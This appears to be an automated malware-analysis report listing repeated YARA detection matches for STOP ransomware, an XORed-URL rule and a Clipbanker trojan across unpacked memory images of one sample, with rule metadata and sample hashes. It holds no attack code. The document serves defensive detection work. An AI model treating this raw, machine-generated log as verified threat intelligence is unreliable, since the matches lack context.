Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 17.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = ec985e1273d8ff52ea7f86271a96db01633402facf8d140d11b82e5539e4b5fd, id = f9f9e79d-ce71-4b6c-83e0-ac6e06252c25, last_modified = 2022-06-09
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b reference_sample = 0407e8f54490b2a24e1834d99ec0452f217499f1e5a64de3d28439d71d16d43c, os = windows, severity = x86, creation_date = 2022-04-24, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Clipbanker, fingerprint = 15f3c7d5f25982a02a6bca0b550b3b65e1e21efa5717a1ea0c13dfe46b8f2699, id = 787b130b-6382-42f0-8822-fce457fa940d, last_modified = 2022-06-09
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
